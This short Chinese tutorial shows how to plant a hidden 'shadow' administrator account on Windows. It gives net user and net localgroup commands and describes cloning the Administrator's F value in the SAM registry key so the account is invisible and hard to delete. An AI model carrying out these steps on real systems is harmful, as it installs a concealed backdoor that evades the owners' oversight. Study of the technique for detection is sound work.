## 影子用户
影子用户
影子用户顾名思义就是一个隐藏用户,只能通过注册表查看这个用户,其它方式是找不到这个用户的信息的
在用户名后面加一个$可以创建一个匿名用户,创建完毕后我们再把这个用户添加到administrator组
“`bash
net user test$ test /add
net localgroup administrators test$ /add
“`
可以看到net user是看不到我们创建的用户,但是计算机管理-用户和组中可以看到
所以这时候我们就需要修改一下注册表,其键位置为:`HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users`
注意:SAM键值默认是只能system权限修改的,所以我们要修改一下SAM键的权限,给予administrator完全控制和读取的权限
然后我们将administrator用户对应的项中的F值复制到test$对应xiang中的F值,然后保存
然后我们将test$删除掉
“`bash
net user test$ /del
“`
然后再双击导出的注册表文件,然后我们再看一下
net user和计算机管理-用户和组中都查看不到用户了,但是我们可以用`net user test$`查看用户信息
这个时候我们再用`net user test$ /del`是删除不掉这个用户的,只能通过注册表来删除。
请登录后查看评论内容